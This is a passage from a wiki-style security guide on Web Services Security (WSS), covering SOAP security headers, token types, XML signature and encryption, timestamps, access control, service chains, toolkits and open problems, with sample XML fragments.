&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
